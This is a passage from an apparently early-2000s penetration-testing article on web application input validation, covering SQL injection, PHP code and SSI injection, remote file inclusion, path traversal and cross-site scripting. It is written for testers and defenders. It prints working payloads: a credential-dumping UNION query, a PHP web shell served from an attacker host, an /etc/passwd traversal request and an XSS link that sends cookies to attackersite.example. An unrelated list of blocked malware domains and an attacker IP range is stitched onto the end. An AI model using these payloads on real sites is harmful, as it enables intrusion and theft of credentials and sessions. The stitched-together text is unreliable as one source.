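A request such as products.php?id=0 UNION SELECT user, pass FROM users (suitably URL-encoded) would return credentials from a hypothetical users table in place of product data, since the injected SELECT supplies the same two columns the page expects.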

For more information on PHP/MySQL security issues, refer to http://www.phpadvisory.com. PHP/MySQL security issues are on the increase - see the phpMyshop (http://www.securityfocus.com/bid/6746) and PHPNuke (http://www.securityfocus.com/bid/7194) advisories for recent examples.

Code and Content Injection

What is code injection? Code injection vulnerabilities occur where the output or content served by a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook), it is sometimes possible to inject code in the scripting language of the application itself.

This vulnerability hinges on the manner in which the application loads and passes through the contents of these manipulated files: if they are fed back through the scripting engine - for example via include() - the user-modified content is parsed and executed along with the application's own code.

Example: A simple message board in PHP

The following snippet of PHP code is used to display posts for a particular message board. It retrieves the messageid GET variable from the user and opens a file $messageid.txt under /var/www/forum:

<?php
include('/var/www/template/header.inc');
$messageid = isset($_GET['messageid']) ? $_GET['messageid'] : '';
if (is_numeric($messageid) &&
    file_exists('/var/www/forum/' . $messageid . '.txt')) {
    // the message file is include()'d, so any PHP code it contains is executed
    include('/var/www/forum/' . $messageid . '.txt');
} else {
    include('/var/www/template/error.inc');
}
include('/var/www/template/footer.inc');
?>

Although the is_numeric() test prevents the user from entering a file path as the messageid, the content of the message file is not checked in any way. (The problem with allowing unchecked entry of file paths is explained later.) If the message contained PHP code, it would be include()'d and therefore executed by the server.

A simple method of exploiting this example vulnerability would be to post a short chunk of code in the language of the application (PHP in this example) to the message board, then view the post and check whether the output indicates the code was executed.
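For instance, a hypothetical probe post might consist of nothing but:

<?php echo 'injection test: '; system('id'); ?>

If viewing the post then displays the output of the id command instead of the raw tags, the application is executing user-supplied code.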

Server Side Includes (SSI)

SSI is a mechanism for including files using a special form of HTML comment, predating the include functionality of modern scripting languages such as PHP and JSP. Older CGI programs and 'classic' ASP scripts still use SSI to include libraries of code or re-usable elements of content, such as a site template header and footer. SSI is interpreted by the Web server, not the scripting language, so if SSI tags can be injected into content that the Web server later serves, they will often be accepted and parsed. Methods of attacking this vulnerability are similar to those shown above for scripting-language injection (see the example below). SSI is rapidly becoming outmoded and disused, so this topic will not be covered in any more detail.
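To illustrate, an attacker might inject a classic SSI directive into content that the Web server later parses (whether it is honoured depends on the server's SSI configuration):

<!--#exec cmd="id" -->

Where SSI processing is enabled for the affected file, the Web server replaces the comment with the output of the command.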

Miscellaneous Injection

There are many other kinds of injection attacks common among Web applications. Since a Web application relies primarily on the contents of headers, cookies and GET/POST variables as input, the actions the application performs based on these variables must be thoroughly examined. The scope of actions a Web application may perform with these variables is potentially limitless: opening files, searching databases, interfacing with other command systems and, as is increasingly common in the Web services world, interfacing with other Web applications. Each of these actions has its own syntax and requires that input variables be sanity-checked and validated in its own particular manner.

For example, as we have seen with SQL injection, SQL special characters and keywords must be stripped. But what about a Web application that opens a serial port and logs information remotely via a modem? Could a user input a modem command escape sequence, causing the modem to hang up and dial other numbers? This is merely one example of the concept of injection. The critical point for the penetration tester is to understand what the Web application is doing in the background - the function calls and commands it executes - and whether the arguments to those calls, or the strings of commands, can be manipulated via headers, cookies and GET/POST variables.

Example: PHP fopen()

As a real-world example, take the widespread PHP fopen() issue. PHP's file-open function fopen() accepts URLs in place of filenames, simplifying access to Web services and remote resources. We will use a simple portal page as an example:

URL: http://www.example.com/index.php?file=main

<?php
include('/var/www/template/header.inc');
$file = isset($_GET['file']) ? $_GET['file'] : 'main';
$fp = fopen($file . '.html', 'r'); // forces a .html suffix, but no directory prefix
fpassthru($fp);                    // stream the opened file into the page output
fclose($fp);
include('/var/www/template/footer.inc');
?>

The index.php script includes header and footer code, and fopen()'s the page indicated by the file GET variable, defaulting to main.html if no file variable is set. The developer forces a file extension of .html, but specifies no directory prefix. A PHP developer inspecting this code should notice immediately that it is vulnerable to a directory traversal attack, so long as the requested filename ends in .html (see below).

However, due to fopen()'s URL handling features, an attacker in this case could submit:

http://www.example.com/index.php?file=http://www.hackersite.com/main

This would force the example application to fopen() the file main.html at www.hackersite.com and stream its contents into the output of index.php. The attacker thereby injects arbitrary content of his or her choosing into the pages the application serves. Worse, PHP's include() and require() honour the same URL wrappers: in the common variant where the script include()s the user-supplied filename rather than merely reading it, any PHP code in the fetched file is parsed and executed on the server.
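In that include() variant, the file hosted on the attacker's server (a hypothetical payload - note the attacker's server must serve it as plain text rather than execute it) could be as simple as:

<?php
// main.html on the attacker's server: executed by the victim when include()'d
system($_GET['cmd']);
?>

handing the attacker remote command execution on the victim host via an extra cmd parameter.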

The W-Agora forum was recently found to contain such a vulnerability in its handling of user input, leaving it open to fopen() attacks of this kind - refer to http://www.securityfocus.com/bid/6463 for more details. It is a perfect example of this particular class of vulnerability.

Many skilled Web application developers are aware of current issues such as SQL injection and will use the many sanity-checking functions and command-stripping mechanisms available. However, once less common command systems and protocols become involved, sanity-checking is often flawed or inadequate due to a lack of comprehension of the wider issues of input validation.

Path Traversal and URIs

A common use of Web applications is to act as a wrapper for files of Web content: opening them and returning them wrapped in chunks of HTML. This can be seen in the code injection sample above. Once again, sanity checking is the key. If the variable specifying the file to be wrapped is not checked, a relative path can be entered.

Returning to the fopen() example from the miscellaneous injection section above, had the developer failed to force a file suffix:

fopen("$file" , "r");

...the attacker would be able to traverse to any file readable by the Web application:

http://www.example.com/index.php?file=../../../../etc/passwd

This request would return the contents of /etc/passwd, unless additional stripping of path characters (../) had been performed on the file variable.

This problem is compounded by the automatic URI handling offered by many modern Web scripting technologies, including PHP, Java and Microsoft's .NET. Where this is supported in the target environment, a vulnerable application can also be used as an open relay or proxy:

http://www.example.com/index.php?file=http://www.google.com/

This flaw is one of the easiest security issues to spot and rectify, although it remains common on smaller sites whose application code performs basic content wrapping. The problem can be mitigated in two ways: first, by implementing an internal numeric index to the documents or, as in our message board code, using files named in numeric sequence with a static prefix and suffix; second, by stripping any path characters (such as / \ .) that attackers could use to access resources outside the application's directory tree. A sketch of the second approach follows.
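The following is a minimal sketch of that second approach (the base directory and whitelist pattern are hypothetical - adjust both to the application):

<?php
$base = '/var/www/pages/';
$file = isset($_GET['file']) ? $_GET['file'] : 'main';
// whitelist: keep only characters that can never form a path or URI
$file = preg_replace('/[^A-Za-z0-9_-]/', '', $file);
// canonicalise, and confirm the result still lives under $base
$path = realpath($base . $file . '.html');
if ($path !== false && strncmp($path, $base, strlen($base)) === 0) {
    readfile($path);
} else {
    include('/var/www/template/error.inc');
}
?>

The whitelist alone defeats both traversal and URI injection; the realpath() check is a second line of defence should the whitelist ever be loosened.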

Cross Site Scripting

Cross Site Scripting (XSS) attacks - a form of content injection - differ from the other attack methods covered in this article in that they affect the client side of the application (i.e. the user's browser). XSS occurs wherever a developer incorrectly allows a user to manipulate the HTML output of the application. This may be in the result of a search query, or in any other output where the user's input is displayed back to the user without any stripping of HTML content.

A simple example of XSS can be seen in the following URL:

http://server.example.com/browse.cfm?categoryID=1&name=Books

In this example the content of the 'name' parameter is displayed on the returned page. A user could submit the following request:

http://server.example.com/browse.cfm?categoryID=1&name=<h1>Books

If the characters < and > are not correctly stripped or escaped by the application, the <h1> tag will be returned within the page and parsed by the browser as valid HTML. A more telling example is the following:

http://server.example.com/browse.cfm?categoryID=1&name=<script>alert(document.cookie)</script>

In this case we have managed to inject JavaScript into the resulting page: upon submitting this request, the cookie (if any) for the current session would be displayed in a popup box.

This can be abused in a number of ways, depending on the attacker's intentions. A short piece of JavaScript that submits the user's cookie to an arbitrary site could be placed in this URL. The request could then be hex-encoded and sent to another user in the hope that they open it. Upon clicking the trusted link, the user's cookie would be submitted to the external site; if the original site relies on cookies alone for authentication, the user's account would be compromised. We will cover cookies in more detail in part three of this series.
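A hypothetical cookie-stealing payload for the URL above (attackersite.example and steal.cgi are placeholders) might be:

http://server.example.com/browse.cfm?categoryID=1&name=<script>document.location='http://attackersite.example/steal.cgi?'+document.cookie</script>

Hex-encoding the payload portion of the link makes it far less conspicuous to the victim.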

In most cases, XSS would only be attempted from a reputable or widely used site, as a user is more likely to click on a long, encoded URL if the server's domain name is trusted. This kind of attack grants no access to the client beyond that of the affected domain (under the user's browser security settings).

For more details on Cross Site Scripting and its potential for abuse, please refer to the CGISecurity XSS FAQ at http://www.cgisecurity.com/articles/xss-faq.shtml.

Conclusion

In this article we have attempted to give the penetration tester a good understanding of the issue of input validation. Each of the subtopics covered here is a deep and complex issue that could well require a series of its own to cover in detail. The reader is encouraged to explore the documents and sites we have referenced for further information.

The final part of this series will discuss in more detail the concepts of sessions and cookies: how Web application authentication mechanisms can be manipulated and bypassed. We will also explore traditional attacks (such as overflows and logic bugs) that have plagued developers for years and remain quite common in the Web application world.
http://www.securityfocus.com/infocus/1709

Blocked DOMAINS / IP address for spreading malicious files (Chat.EXE, Chat.DLL)

navy.scvhosts.com:443
navy.conimes.com:443
mail.lovexfree.com:443
ncw.winlogon.net:443
gold.MrBonus.com:443
shoes.sellClassics.com:443

[ATTACKER IP] src IP: 222.122.198.0/24
